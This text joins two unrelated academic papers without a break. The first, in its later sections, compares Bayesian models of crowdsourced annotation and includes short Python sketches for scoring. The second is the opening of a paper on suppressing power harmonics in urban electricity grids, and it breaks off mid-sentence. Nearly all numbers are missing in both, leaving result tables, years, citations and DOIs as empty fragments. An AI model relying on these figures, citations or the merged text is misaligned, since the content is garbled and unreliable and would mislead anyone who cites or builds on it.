this evaluation is conducted first and consists of a comparison against a gold standard. one problem with this as- sessment is caused by ambiguity—previous stud- ies indicating disagreement even among experts. because obtaining a true gold standard is question- able, we further explore a complementary evalua- tion, assessing the predictive performance of the models, a standard evaluation approach from the literature on bayesian models. another core task models of annotation are used for is to character- ize the accuracy of the annotators and their error patterns. this is the third objective of this evalu- ation. finally, we conclude this section assessing the ability of the models to correctly diagnose the items for which potentially incorrect labels have been inferred. the pd data are too sparse to fit the models with item-level difficulties (i.e., itemdiff and logrndeff). these models are therefore not present in the evaluations conducted on the pd corpus. . comparison against a gold standard a core task models of annotation are used for is to infer the correct interpretations from crowd- annotated datasets. this section compares the inferred interpretations with a gold standard. tables , and present the results. on wsd and temp datasets (see table ), characterized by a small number of items and annotators (statis- tics in table ), the different model complexi- ties result in no gains, all the models performing the results for majvote, hierd&s, and logrndeff we report match or slightly outperform those reported by carpenter ( ) on the rte dataset. similar for mace, across wsd, rte, and temp datasets (hovy et al., ). model result statistical significance multinom . d&s* hierd&s* logrndeff* mace* d&s . itemdiff* majvote multinom* hierd&s . itemdiff* majvote* multinom* itemdiff . logrndeff* mace* d&s* hierd&s* logrndeff . majvote* multinom* itemdiff* mace . majvote* multinom* itemdiff* majvote . d&s hierd&s* logrndeff* mace* table : rte dataset results against the gold standard. both micro (accuracy) and macro (p, r, f) scores are the same. * indicates that significance ( . threshold) holds after applying the bonferroni correction. equivalently. statistically significant differences ( . threshold, plus bonferroni correction for type errors; see § . for details) are, however, very much present in tables (rte dataset) and (pd dataset). here the results are dominated by the unpooled (d&s and mace) and partially pooled models (logrndeff, and hierd&s, except for pd, as discussed later in § . ), which assume some form of annotator structure. further- more, modeling the full annotator response matrix leads in general to better results (e.g., d&s vs. mace on the pd dataset). ignoring completely any annotator structure is rarely appropriate, such models failing to capture the different levels of expertise the coders have—see the poor perfor- mance of the unpooled multinom model and of the partially pooled itemdiff model. similarly, the majvote baseline implicitly assumes equal expertise among coders, leading to poor perfor- mance results. . predictive accuracy ambiguity causes disagreement even among ex- perts, affecting the reliability of existing gold standards. this section presents a complementary evaluation, namely, predictive accuracy. 
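the quantity reported in this setting is the log predictive density of equation ( ) above, summed over the k folds; given the log-likelihood of each held-out annotation under each posterior draw, it can be approximated as in this sketch (written for this rewrite, using the standard log-sum-exp trick for numerical stability):

import numpy as np
from scipy.special import logsumexp

def fold_lpd(log_lik_draws):
    # log_lik_draws: array of shape (M, N_k) holding log p(y_n | theta^(k,m)) for
    # M posterior draws and the N_k held-out annotations of fold k.
    per_draw = log_lik_draws.sum(axis=1)          # joint log density of the fold per draw
    m = per_draw.shape[0]
    # log (1/M) sum_m exp(per_draw[m]), computed stably
    return float(logsumexp(per_draw) - np.log(m))

def total_lpd(folds):
    # folds: list of per-fold arrays as above; the table normalizes this value by
    # the number of items (lpd / i).
    return float(sum(fold_lpd(f) for f in folds))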
in a simi- lar spirit to the results obtained in the comparison against the gold standard, modeling the ability of the annotators was also found to be essential for a good predictive performance (results presented accuracy (micro) f-measure (macro) model result statistical significance result statistical significance multinom . d&s* hierd&s* mace* majvote . d&s* hierd&s* mace* majvote* d&s . hierd&s* mace* majvote* multinom* . hierd&s* mace* majvote* multinom* hierd&s . mace* majvote* multinom* d&s* . majvote* multinom* d&s* mace . majvote* multinom* d&s* hierd&s* . majvote* multinom* d&s* majvote . multinom d&s* hierd&s* mace* . multinom* d&s* hierd&s* mace* precision (macro) recall (macro) model result statistical significance result statistical significance multinom . d&s* hierd&s* mace* majvote* . hierd&s* majvote* d&s . hierd&s* mace* multinom* . hierd&s mace majvote* hierd&s . mace* majvote* multinom* d&s* . mace* majvote* multinom* d&s mace . majvote multinom* d&s* hierd&s* . majvote* d&s hierd&s* majvote . multinom* hierd&s* mace . multinom* d&s* hierd&s* mace* table : pd dataset results against the gold standard. * indicates that significance holds after bonferroni correction. dataset model accµ pm rm fm wsd itemdiff . . . . logrndeff others . . . . temp majvote . . . . others . . . . table : results against the gold (µ = micro; m = macro). in table ). however, in this type of evaluation, the unpooled models can overfit, affecting their performance (e.g., a model of higher complex- ity like d&s, on a small dataset like wsd). the partially pooled models avoid overfitting through the hierarchical structure obtaining the best pre- dictive accuracy. ignoring the annotator structure (itemdiff and multinom) leads to poor per- formance on all datasets except for wsd, where this assumption is roughly appropriate since all the annotators have a very high proficiency (above %). . annotators’ characterization another core task models of annotation are used for is to characterize the accuracy and bias of the annotators. we first assess the correlation between the esti- mated and gold accuracy of the annotators. the re- sults, presented in table , follow the same pattern to those obtained in § . : a better performance of the unpooled (d&s and mace ) and partially pooled models (logrndeff and hierd&s, ex- cept for pd, as discussed later in § . ). the results the results of our reimplementation match the published ones (hovy et al., ). model wsd rte temp pd* multinom - . - . - . - . d&s - . - . - . - . hierd&s - . - . - . - . itemdiff - . - . - . - logrndeff - . - . - . - mace - . - . - . - . table : the log predictive density results, normalized to a per-item rate (i.e., lpd/i). larger values indicate a better predictive performance. pd* is a subset of pd such that each annotator has a number of annotations at least as big as the number of folds. are intuitive: a model that is accurate with respect to the gold standard should also obtain high corre- lation at annotator level. the pd corpus also comes with a list of self- confessed spammers and one of good, established players (see table for a few details). continuing with the correlation analysis, an inspection of the second-to-last column from table shows largely accurate results for the list of spammers. on the second category, however, the non-spammers (the last column), we see large differences between models, following the same pattern with the previ- ous correlation results. 
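the estimated accuracies being correlated here are the post-inference quantities defined in § . : the proportion of an annotator's labels that match the inferred item classes. a minimal sketch (illustrative code, not the authors') of the accuracy estimate and its correlation with the gold-based accuracy:

import numpy as np
from collections import defaultdict

def annotator_accuracy(annotations, item_classes):
    # annotations: iterable of (item_id, annotator_id, label) triples.
    # item_classes: dict item_id -> class (either model-inferred or gold).
    hits, totals = defaultdict(int), defaultdict(int)
    for item, annotator, label in annotations:
        totals[annotator] += 1
        hits[annotator] += int(label == item_classes[item])
    return {a: hits[a] / totals[a] for a in totals}

def accuracy_correlation(annotations, inferred, gold):
    # pearson correlation between model-estimated and gold-based annotator accuracy.
    est = annotator_accuracy(annotations, inferred)
    ref = annotator_accuracy(annotations, gold)
    annotators = sorted(est)
    return float(np.corrcoef([est[a] for a in annotators],
                             [ref[a] for a in annotators])[0, 1])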
an inspection of the spam- mers’ annotations show an almost exclusive use of the dn (discourse new) class, which is highly prevalent in pd and easy for the models to infer; the non-spammers, on the other hand, make use of all the classes, making it more difficult to capture their behavior. in a typical coreference corpus, over % of mentions are dn; thus, always choosing dn results in a good accuracy level. the one-class preference is a common spamming be- havior (hovy et al., ; passonneau and carpenter, ). model wsd rte temp pd s ns majvote . . . . . . line multinom . . . . . . d&s . . . . . . hierd&s . . . . . . itemdiff . . . - - - logrndeff . . . - - - mace . . . . . . table : correlation between gold and estimated accu- racy of annotators. the last two columns refer to the list of known spammers and non-spammers in pd. type size gold accuracy quantiles spammers . . . non-spammers . . . table : statistics on player types. reported quantiles are . %, %, and . %. we further examine some useful parameter estimates for each player type. we chose one spammer and one non-spammer and discuss the confusion matrix inferred by d&s, together with the credibility and spamming preference given by mace. the two annotators were chosen to be rep- resentative for their type. the selection of the mod- els was guided by their two different approaches to capturing the behavior of the annotators. table presents the estimates for the annotator selected from the list of spammers. again, inspec- tion of the confusion matrix shows that, irrespec- tive of the true class, the spammer almost always produces the dn label. the mace estimates are similar, allocating credibility to this annotator, and full spamming preference for the dn class. in table we show the estimates for the anno- tator chosen from the non-spammers list. their response matrix indicates an overall good perfor- mance (see diagonal matrix), albeit with a con- fusion of pr (property) for dn (discourse new), which is not surprising given that indefinite nps (e.g., a policeman) are the most common type of mention in both classes. mace allocates large credibility to this annotator and shows a similar spamming preference for the dn class. this discussion, as well as the quantiles from table , show that poor accuracy is not by it- self a good indicator of spamming. a spammer like the one discussed in this section can obtain good performance by always choosing a class with high frequency in the gold standard. at the same time, a non-spammer may fail to recognize some true classes correctly, but be very good on oth- ers. bayesian models of annotation allow captur- d&s βj nr dn pr do nr . . . . dn . . . . pr . . . . do . . . . mace �j nr dn pr do . . . . θj . table : spammer analysis example. d&s provides a confusion matrix; mace shows the spamming prefer- ence and the credibility. d&s βj nr dn pr do nr . . . . dn . . . . pr . . . . do . . . . mace �j nr dn pr do . . . . θj . table : a non-spammer analysis example. d&s pro- vides a confusion matrix; mace shows the spamming preference and the credibility. ing and exploiting these observations. for a model like d&s, such a spammer presents no harm, as their contribution towards any potential true class of the item is the same and therefore cancels out. . filtering using model confidence this section assesses the ability of the models to correctly diagnose the items for which potentially incorrect labels have been inferred. 
concretely, we identify the items that the models are least confi- dent in (measured using the entropy of the poste- rior of the true class distribution) and present the accuracy trends as we vary the proportion of fil- tered out items. overall, the trends (figures , and ) indicate that filtering out the items with low confidence improves the accuracy of all the models and across all datasets. point also made by passonneau and carpenter ( ). the trends for mace match the published ones. also, we left out the analysis on the wsd dataset, as the models already obtain % accuracy without any filtering (see § . ). figure : effect of filtering on rte: accuracy (y-axis) vs. proportion of data with lowest entropy (x-axis). figure : temp dataset: accuracy (y-axis) vs. propor- tion of data with lowest entropy (x-axis). discussion we found significant differences across a number of dimensions between both the annotation models and between the models and majvote. . observations and guidelines the completely pooled model (multinom) un- derperforms in almost all types of evaluation and all datasets. its weakness derives from its core as- sumption: it is rarely appropriate in crowdsourc- ing to assume that all annotators have the same ability. the unpooled models (d&s and mace) as- sume each annotator has their own response pa- rameter. these models can capture the accuracy and bias of annotators, and perform well in all evaluations against the gold standard. lower performance is obtained, however, on posterior predictions: the higher complexity of unpooled models results in overfitting, which affects their predictive performance. the partially pooled models (itemdiff, hierd&s, and logrndeff) assume both figure : pd dataset: accuracy (y-axis) vs. proportion of data with lowest entropy (x-axis). individual and hierarchical structure (capturing population behavior). these models achieve the best of both worlds, letting the data determine the level of pooling that is required: they asymptote to the unpooled models if there is a lot of variance among the individuals in the population, or to the fully pooled models when the variance is very low. this flexibility ensures good performance both in the evaluations against the gold standard and in terms of their predictive performance. across the different types of pooling, the mod- els that assume some form of annotator structure (d&s, mace, logrndeff, and hierd&s) came out on top in all evaluations. the unpooled models (d&s and mace) register on par performance with the partially pooled ones (logrndeff and hierd&s, except for the pd dataset, as discussed later in this section) in the evaluations against the gold standard, but as pre- viously mentioned, can overfit, affecting their predictive performance. ignoring any annotator structure (the pooled multinom model, the par- tially pooled itemdiff model, or the majvote baseline) leads generally to poor performance results. the approach we took in this paper is domain- independent, that is, we did not assess and com- pare models that use features extracted from the data, even though it is known that when such fea- tures are available, they are likely to help (raykar et al., ; felt et al., a; kamar et al., ). this is because a proper assessment of such mod- els would also require a careful selection of the features and how to include them into a model of annotation. a bad (i.e., misspecified in the statistical sense) domain model is going to hurt more than help as it will bias the other estimates. 
providing guidelines for this feature-based analysis would have excessively expanded the scope of this paper. but feature-based models of annotation are extensions of the standard annotation-only mod- els; thus, this paper can serve as a foundation for the development of such models. a few exam- ples of feature-based extensions of standard mod- els of annotation are given in § to guide readers who may want to try them out for their specific task/domain. the domain-independent approach we took in this paper further implies that there are no dif- ferences between applying these models to cor- pus annotation or other crowdsourcing tasks. this paper is focused on resource creation and does not propose to investigate the performance of the models in downstream tasks. however, previous work already used such models of annotation for nlp (plank et al., a; sabou et al., ; habernal and gurevych, , image labeling (smyth et al., ; kamar et al., ), or med- ical (albert and dodd, ; raykar et al., ) tasks. although hierd&s normally achieves the best performance in all evaluations on the snow et al. ( ) datasets, on the pd data it is outper- formed by the unpooled models (mace and d&s). to understand this discrepancy, note that the datasets from snow et al. ( ) were pro- duced using amazon mechanical turk, by mainly highly skilled annotators; whereas the pd dataset was produced in a game-with-a-purpose setting, where most of the annotations were made by only a handful of coders of high quality, the rest be- ing produced by a large number of annotators with much lower abilities. these observations point to a single population of annotators in the former datasets, and to two groups in the latter case. the reason why the unpooled models (mace and d&s) outperform the partially pooled hierd&s model on the pd data is that this class of mod- els assumes no population structure—hence, there is no hierarchical influence; a multi-modal hierar- chical prior in hierd&s might be better suited for the pd data. this further suggests that results depend to some extent on the dataset specifics. this does not alter the general guidelines made in this paper. . technical notes posterior curvature. in hierarchical models, a complicated posterior curvature increases the dif- ficulty of the sampling process affecting con- vergence. this may happen when the data are sparse or when there are large inter-group vari- ances. one way to overcome this problem is to use a non-centered parameterization (betancourt and girolami ). this approach separates the lo- cal parameters from their parents, easing the sam- pling process. this often improves the effective sample size and, ultimately, the convergence (i.e., lower r̂). the non-centered parameterization of- fers an alternative but equivalent implementation of a model. we found this essential to ensure a robust implementation of the partially pooled models. label switching. the label switching problem that occurs in mixture models is due to the like- lihood’s invariance under the permutation of the labels. this makes the models nonidentifiable. convergence cannot be directly assessed, because the chains will no longer overlap. we use a gen- eral solution to this problem from gelman et al. ( ): re-label the parameters, post-inference, based on a permutation that minimizes some loss function. for this survey, we used a small ran- dom sample of the gold data (e.g., five items per class) to find the permutation that maximizes model accuracy for every chain-fit. 
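a sketch of that permutation search (illustrative code added for this rewrite; with the small class counts typical of annotation tasks, exhaustively trying all k! relabellings is cheap):

import numpy as np
from itertools import permutations

def best_label_permutation(predicted, gold, num_classes):
    # predicted: class indices inferred by one chain for a small gold-labelled sample.
    # gold: the corresponding gold class indices.
    best_perm, best_acc = None, -1.0
    for perm in permutations(range(num_classes)):
        relabelled = np.array([perm[c] for c in predicted])
        acc = float((relabelled == np.asarray(gold)).mean())
        if acc > best_acc:
            best_perm, best_acc = perm, acc
    return best_perm, best_acc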
we then re- labeled the parameters of each chain according to the chain-specific permutation before combining them for convergence assessment. this ensures model identifiability and gold alignment. related work bayesian models of annotation share many char- acteristics with so called item-response and ideal- point models. a popular application of these models is to analyze data associated with indi- viduals and test items. a classic example is the rasch model (rasch, ) which assumes that the probability of a person being correct on a test item is based on a subtractive relationship be- tween their ability and the difficulty of the item. the model takes a supervised approach to jointly estimating the ability of the individuals and the difficulty of the test items based on the correct- ness of their responses. the models of annota- tion we discussed in this paper are completely unsupervised and infer, in addition to annotator ability and/or item difficulty, the correct labels. more details on item-response models are given in skrondal and rabe-hesketh ( ) and gelman and hill ( ). item-response theory has also been recently applied to nlp applications (lalor et al., ; martınez-plumed et al., ; lalor et al., ). the models considered so far take into account only the annotations. there is work, however, that further exploits the features that can accompany items. a popular example is the model introduced by raykar et al. ( ), where the true class of an item is made to depend both on the annotations and on a logistic regression model that are jointly fit; essentially, the logistic regression replaces the simple categorical model of prevalence. felt et al. ( , b) introduced similar models that also modeled the predictors (features) and compared them to other approaches (felt et al., a). kamar et al. ( ) account for task-specific fea- ture effects on the annotations. in § . , we discussed the label switching prob- lem (stephens, ) that many models of an- notation suffer from. other solutions proposed in the literature include utilizing class-informative priors, imposing ordering constraints (obvious for univariate parameters; less so in multivariate cases) (gelman et al., ), or applying different post-inference relabeling techniques (felt et al., ). conclusions this study aims to promote the use of bayesian models of annotation by the nlp community. these models offer substantial advantages over both agreement statistics (used to judge coding standards), and over majority-voting aggregation to generate gold standards (even when used with heuristic censoring or adjudication). to provide assistance in this direction, we compare six existing models of annotation with distinct prior and likelihood structures (e.g., pooled, unpooled, and partially pooled) and a diverse set of effects (annotator ability, item difficulty, or a subtractive relationship between the two). we use various evaluation settings on four datasets, with different levels of sparsity and annotator accuracy, and report significant differences both among the models, and between models and majority voting. as importantly, we provide guidelines to both aid users in the selection of the models and to raise awareness of the technical aspects essential to their implementation. we release all models evaluated here as stan implementations at http://dali.eecs.qmul.ac.uk/paper/ supplementary_material.zip. acknowledgments paun, chamberlain, and poesio are supported by the dali project, funded by erc. carpenter is partly supported by the u.s. 
national science foundation and the u.s. office of naval research. references paul s. albert and lori e. dodd. . a caution- ary note on the robustness of latent class models for estimating diagnostic error without a gold standard. biometrics, ( ): – . ron artstein and massimo poesio. . inter- coder agreement for computational linguistics. computational linguistics, ( ): – . james o. berger. . statistical decision the- ory and bayesian analysis. springer. josé m. bernardo and adrian f. m. smith. . bayesian theory. iop publishing. michael betancourt and mark girolami. . hamiltonian monte carlo for hierarchical mod- els. current trends in bayesian methodology with applications, : . bob carpenter. . multilevel bayesian mod- els of categorical data annotation. unpublished manuscript. bob carpenter, andrew gelman, matt hoffman, daniel lee, ben goodrich, michael betancourt, michael a. brubaker, jiqiang guo, peter li, and allen riddell. . stan: a probabilistic programming language. journal of statistical software, ( ): – . jon chamberlain, massimo poesio, and udo kruschwitz. . phrase detectives corpus . : crowdsourced anaphoric coreference. in pro- ceedings of the international conference on language resources and evaluation (lrec ), portoroz, slovenia. alexander philip dawid and allan m. skene. . maximum likelihood estimation of ob- server error-rates using the em algorithm. ap- plied statistics, ( ): – . http://dali.eecs.qmul.ac.uk/papers/supplementary_material.zip http://dali.eecs.qmul.ac.uk/papers/supplementary_material.zip https://doi.org/ . /j. - x. . .x https://doi.org/ . /j. - x. . .x https://doi.org/ . /j. - x. . .x https://doi.org/ . /j. - x. . .x https://lingpipe.files.wordpress.com/ / /carp-bayesian-multilevel-annotation.pdf https://lingpipe.files.wordpress.com/ / /carp-bayesian-multilevel-annotation.pdf https://doi.org/ . /jss.v .i https://doi.org/ . /jss.v .i bradley efron. . large-scale inference: em- pirical bayes methods for estimation, testing, and prediction, volume . cambridge univer- sity press. alvan r. feinstein and domenic v. cicchetti. . high agreement but low kappa: i. the problems of two paradoxes. journal of clinical epidemiology, ( ): – . paul felt, kevin black, eric ringger, kevin seppi, and robbie haertel. a. early gains matter: a case for preferring generative over discrimi- native crowdsourcing models. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies. paul felt, robbie haertel, eric k. ringger, and kevin d. seppi. . momresp: a bayesian model for multi-annotator document labeling. in proceedings of the international conference on language resources and eval- uation (lrec ), reykjavik. paul felt, eric k. ringger, jordan boyd-graber, and kevin seppi. b. making the most of crowdsourced document annotations: confused supervised lda. in proceedings of the nine- teenth conference on computational natural language learning, pages – . andrew gelman, john b. carlin, hal s. stern, david b. dunson, aki vehtari, and donald b. rubin. . bayesian data analysis, third edition. chapman & hall/crc texts in sta- tistical science. taylor & francis. andrew gelman and jennifer hill. . data analysis using regression and multi- level/hierarchical models. analytical methods for social research. cambridge university press. andrew gelman and donald b. rubin. . in- ference from iterative simulation using multiple sequences. statistical science, : – . tilmann gneiting, fadoua balabdaoui, and adrian e. 
raftery. . probabilistic fore- casts, calibration and sharpness. journal of the royal statistical society: series b (statistical methodology), ( ): – . ivan habernal and iryna gurevych. . what makes a convincing argument? empirical anal- ysis and detecting attributes of convincingness in web argumentation. in proceedings of the conference on empirical methods in nat- ural language processing, pages – . dirk hovy, taylor berg-kirkpatrick, ashish vaswani, and eduard hovy. . learning whom to trust with mace. in proceedings of the conference of the north american chapter of the association for computational linguistics: human language technologies, pages – . ece kamar, ashish kapoor, and eric horvitz. . identifying and accounting for task- dependent bias in crowdsourcing. in third aaai conference on human computation and crowdsourcing. hyun-chul kim and zoubin ghahramani. . bayesian classifier combination. in proceed- ings of the fifteenth international confer- ence on artificial intelligence and statistics, pages – , la palma, canary islands. john lalor, hao wu, and hong yu. . build- ing an evaluation scale using item response the- ory. in proceedings of the conference on empirical methods in natural language pro- cessing, pages – . association for com- putational linguistics. john p. lalor, hao wu, and hong yu. . improving machine learning ability with fine- tuning. corr, abs/ . . version . matthew lease and gabriella kazai. . overview of the trec crowdsourcing track. in proceedings of the text retrieval con- ference (trec). fernando martınez-plumed, ricardo b. c. prudêncio, adolfo martınez-usó, and josé hernández-orallo. . making sense of item response theory in machine learning. in proceedings of nd european conference on artificial intelligence (ecai), frontiers in artificial intelligence and applications, volume , pages – . thiago g. martins, daniel simpson, finn lindgren, and håvard rue. . bayesian computing https://books.google.co.uk/books?id=zxl aqaaqbaj https://books.google.co.uk/books?id=zxl aqaaqbaj https://books.google.co.uk/books?id=lv didv f ac https://books.google.co.uk/books?id=lv didv f ac https://doi.org/ . /ss/ https://doi.org/ . /ss/ https://doi.org/ . /ss/ https://doi.org/ . /v /d - https://doi.org/ . /v /d - https://doi.org/ . /v /d - http://arxiv.org/abs/ . http://arxiv.org/abs/ . with inla: new features. computational statistics & data analysis, : – . pablo g. moreno, antonio artés-rodríguez, yee whye teh, and fernando perez-cruz. . bayesian nonparametric crowdsourcing. jour- nal of machine learning research. rebecca j. passonneau and bob carpenter. . the benefits of a model of annotation. transac- tions of the association for computational lin- guistics, : – . juho piironen and aki vehtari. . comparison of bayesian predictive methods for model selec- tion. statistics and computing, ( ): – . barbara plank, dirk hovy, ryan mcdonald, and anders søgaard. a. adapting taggers to twitter with not-so-distant supervision. in proceedings of coling , the th inter- national conference on computational linguis- tics: technical papers, pages – . barbara plank, dirk hovy, and anders sogaard. b. linguistically debatable or just plain wrong? in proceedings of the nd annual meeting of the association for computational linguistics (volume : short papers). massimo poesio and ron artstein. . the re- liability of anaphoric annotation, reconsidered: taking ambiguity into account. in proceedings of acl workshop on frontiers in corpus anno- tation, pages – . 
nguyen quoc viet hung, nguyen thanh tam, lam ngoc tran, and karl aberer. . an evaluation of aggregation techniques in crowd- sourcing. in web information systems engi- neering – wise , pages – , berlin, heidelberg. springer berlin heidelberg. sophia rabe-hesketh and anders skrondal. . generalized linear mixed-effects models. lon- gitudinal data analysis, pages – . georg rasch. . probabilistic models for some intelligence and attainment tests. eric. vikas c. raykar, shipeng yu, linda h. zhao, gerardo hermosillo valadez, charles florin, luca bogoni, and linda moy. . learning from crowds. journal of machine learning re- search, : – . marta sabou, kalina bontcheva, leon derczynski, and arno scharl. . corpus annotation through crowdsourcing: towards best practice guidelines. in proceedings of the ninth interna- tional conference on language resources and evaluation (lrec- ), pages – . aashish sheshadri and matthew lease. . square: a benchmark for research on com- puting crowd consensus. in proceedings of the st aaai conference on human computation (hcomp), pages – . edwin simpson, stephen roberts, ioannis psorakis, and arfon smith. . dynamic bayesian combination of multiple imperfect classifiers. springer berlin heidelberg, berlin, heidelberg. anders skrondal and sophia rabe-hesketh. . generalized latent variable modeling: mul- tilevel, longitudinal, and structural equation models. chapman & hall/crc interdisci- plinary statistics. taylor & francis. mark d. smucker, james allan, and ben carterette. . a comparison of statisti- cal significance tests for information retrieval evaluation. in proceedings of the sixteenth acm conference on conference on informa- tion and knowledge management, cikm ’ , pages – , new york, ny, usa. acm. padhraic smyth, usama m. fayyad, michael c. burl, pietro perona, and pierre baldi. . in- ferring ground truth from subjective labelling of venus images. in advances in neural informa- tion processing systems, pages – . rion snow, brendan o’connor, daniel jurafsky, and andrew y. ng. . cheap and fast - but is it good? evaluating non-expert annotations for natural language tasks. in proceedings of the conference on empirical methods in natu- ral language processing, pages – . matthew stephens. . dealing with label switching in mixture models. journal of the royal statistical society: series b (statistical methodology), ( ): – . chris van pelt and alex sorokin. . de- signing a scalable crowdsourcing platform. in https://doi.org/ . /s - - -y https://doi.org/ . /s - - -y https://doi.org/ . /s - - -y http://ir.ischool.utexas.edu/square/documents/sheshadri.pdf http://ir.ischool.utexas.edu/square/documents/sheshadri.pdf https://doi.org/ . / - - - - _ https://doi.org/ . / - - - - _ https://doi.org/ . / - - - - _ https://books.google.ro/books?id=jjr agaaqbaj https://books.google.ro/books?id=jjr agaaqbaj https://books.google.ro/books?id=jjr agaaqbaj https://doi.org/ . / . https://doi.org/ . / . https://doi.org/ . / . https://doi.org/ . / - . https://doi.org/ . / - . proceedings of the acm sigmod inter- national conference on management of data, pages – . acm. aki vehtari, andrew gelman, and jonah gabry. . practical bayesian model evaluation us- ing leave-one-out cross-validation and waic. statistics and computing, ( ): – . jacob whitehill, ting-fan wu, jacob bergsma, javier r. movellan, and paul l. ruvolo. . whose vote should count more: optimal in- tegration of labels from labelers of unknown expertise. in advances in neural information processing systems , pages – . 
international journal of advanced network, monitoring and controls, volume , no.

solutions for governance and suppression of power harmonic in cities

li xiangchu, hunan nonferrous metals vocational and technical college, zhuzhou, hunan, china, e-mail: hnysjxjwk@ .com
zhang wei, hunan nonferrous metals vocational and technical college, zhuzhou, hunan, china

abstract—based on the current status of cities' power supply and distribution systems, this paper conducts theoretical and experimental investigations into the generation and hazards of power harmonics, as well as the techniques for restraining and suppressing them. a scheme-selection solution for controlling and suppressing power harmonics, suited to the current power supply and distribution systems of big and medium-sized cities, is proposed. this study not only provides important implications for big and medium-sized cities, but also offers substantial reference value for controlling and suppressing power harmonics in the public utility system in china.

keywords—power harmonic; governance and suppression; solution

i. introduction

with the transformation and upgrading of industrial cities, nonlinear loads such as converters, rectifiers and inverters built around power-semiconductor devices (insulated gate bipolar transistors (igbt) and intelligent power modules (ipm)) have come into wide use. although high-power nonlinear converter equipment is advanced and reliable in terms of energy saving and control technology, its inherent characteristics generate a large amount of harmonic content, causing voltage and current waveform distortion in the power supply system; a simple way to quantify such distortion, the total harmonic distortion (thd) reported later in this paper, is sketched below.
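the following minimal python sketch is not part of the original paper; it only illustrates how total harmonic distortion can be estimated from a sampled voltage or current waveform with an fft. the sampling rate, fundamental frequency, harmonic orders and test waveform are all assumed values chosen for the example.

```python
import numpy as np

def thd(signal, fs, f0, n_harmonics=40):
    """estimate total harmonic distortion of a sampled waveform.

    signal      : 1-d array of voltage or current samples
    fs          : sampling rate in hz
    f0          : fundamental frequency in hz
    n_harmonics : number of harmonic orders to include
    """
    spectrum = np.abs(np.fft.rfft(signal)) / len(signal)
    freqs = np.fft.rfftfreq(len(signal), d=1.0 / fs)

    def amplitude(f):
        # amplitude of the spectral bin closest to frequency f
        return spectrum[np.argmin(np.abs(freqs - f))]

    fund = amplitude(f0)
    harmonics = [amplitude(k * f0) for k in range(2, n_harmonics + 1)]
    return np.sqrt(np.sum(np.square(harmonics))) / fund

# example: a 50 hz waveform polluted by 5th and 7th harmonics, as typically
# produced by six-pulse rectifier loads; amplitudes are illustrative only
fs = 10_000
t = np.arange(0, 0.2, 1 / fs)
v = (np.sin(2 * np.pi * 50 * t)
     + 0.08 * np.sin(2 * np.pi * 250 * t)
     + 0.05 * np.sin(2 * np.pi * 350 * t))
print(f"thd = {100 * thd(v, fs, 50):.1f} %")   # about 9.4 %
```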
[ ] the consequence is that the power quality of the utility grid falls below standard or worse, and the normal, safe operation of the grid and of electrical equipment is badly affected. therefore, research on restraining and suppressing power harmonics in the urban utility grid has sound theoretical and practical value for improving power quality, and thereby better serves the transformation and upgrading of the city.

ii. cause of power harmonic

power harmonics in the city utility grid are mainly produced by nonlinear load equipment; impact loads, asymmetric loads and nonlinear loads all contribute, with nonlinear loads being the most important source. [ ] inverters, uninterruptible power supplies (ups), power converter equipment (such as rectifiers and inverters), industrial computers and other high-power nonlinear loads are the harmonic sources of the utility grid. [ ] with the spread of inverter-based control in industrial control and other fields, the frequency converter has become the main source of power harmonics in the urban public grid.

iii. hazard of power harmonics

the harm caused by harmonic pollution of the urban public power grid shows up in many ways, mainly the following.

1) it reduces the utilization rate of electrical equipment: transformers, motors, power capacitors and other equipment, as well as cables, low-voltage neutral lines, busbars and other conductors, operate in an overloaded state with vibration, overheating, abnormal noise and so on. this shortens the service life of the power equipment and increases energy losses. [ ]

2) it interferes with relay protection, automatic devices and computer systems; it makes precision electronic equipment work abnormally or even burn out; and it increases the error of measuring and metering instruments. [ ]

3) it reduces the quality of signal transmission and interferes with communication systems. usually, harmonics of ~ hz generate communication noise, while harmonics above hz lead to misoperation of the telephone-circuit signal. [ ]

iv. governance and suppression of power harmonic

in engineering practice, the governance and suppression of power harmonics in the city utility grid is mainly divided into the following three types.

1) connecting a series detuning reactor. the main purpose of this measure is to prevent the reactive power compensation device (such as power capacitors) from excessively amplifying power harmonics or falling into resonance once it is connected to the grid; its filtering effect, however, is small. [ - ]

2) using a passive power filter (pf) for harmonic governance. the passive power filter is a filter circuit that uses combinations of inductance, capacitance and resistance to filter out one or several harmonic orders. it is currently the basic means of managing and restraining power harmonics in the city utility grid. despite its merits of simple structure, low cost, reliable running and cheap operation, its harmonic governance effect is not ideal, and it can introduce new problems such as oscillation of the power supply and distribution system and harmonic amplification. [ ]

3) using an active power filter (apf) for harmonic governance.
the active power filter (apf) is a new type of special equipment based on modern power electronic technology and digital signal processing technology to govern electric power harmonics.[ ] the basic principle of harmonic elimination is electricity generated during runtime equals the current amplitude of power harmonic, reversal polarity of harmonic current into the power supply system and compensate or offset the electric power harmonic current, and take the initiative to eliminate electric power harmonic. it has the merits of high control precision, fast response, good harmonic elimination effect and etc. active power filter (apf) is a new research that enjoys a promising prospect in the field of future electric power harmonic governance and comprehensive optimization of power quality. v. solution for governance and suppression of power harmonic in cities a. about general solution with increasingly attention paid to the governance of electric power harmonic, related industries get fast development during the period of “china's th five-year plan”. there are a large variety of measures and products for the governance of electric power harmonic. establishing reasonable selection schemes can guide technical personnel to choose measures and products according to the actual circumstance of electric power harmonic in power supply and distribution system. [ ] based on the harmonic voltage limit and harmonic current allowable value regulated in the utility grid national standard gb/t - utility grid harmonic power quality, [ ] this paper sets the nominal voltage of . kv for example, and establishes a model selection scheme for the power harmonic governance and suppression of urban utility grid, as is shown in figure . international journal of advanced network, monitoring and controls volume , no. , figure . model selection for power harmonic governance and suppression b. specific solution for power harmonic governance and suppression by using technological upgrading projects as engineering case, this paper conducts researches on solutions for power harmonic governance and suppression. ) about technological upgrading projects: a utility grid in hunan is mainly composed of one transformer s - , equipped with kvar pgj type of reactive power compensation device. load is composed of sets of kva ups, switching power supply and air conditioning. when the system runs, output cable of the transformer reaches degrees centigrade, cable vibration and electronic equipment interference become bigger. [ ] customer’s technological upgrading requirements are as following: a) lowering the temperature rise of the cable and eliminating cable vibration; b) reducing interference of electronic devices. ) intended solutions: based on customer’s technological upgrading requirements, the project group did a lot of resourcing work and field investigation to make sure the design rationality of this power supply and distribution system. field test shows the distortion rate of voltage total harmonic was . %, the distortion rate of current total harmonic was . %. ups and six pulse rectifier are the main nonlinear load that generate harmonics. comparative analysis of these data proves that this project is under serious harmonic pollution and hazard. according to figure , the choice of active power filter can effectively suppress the electric power harmonic. detailed solutions are as following: a) retaining reactive power compensation device pgj type kvar; b) one set 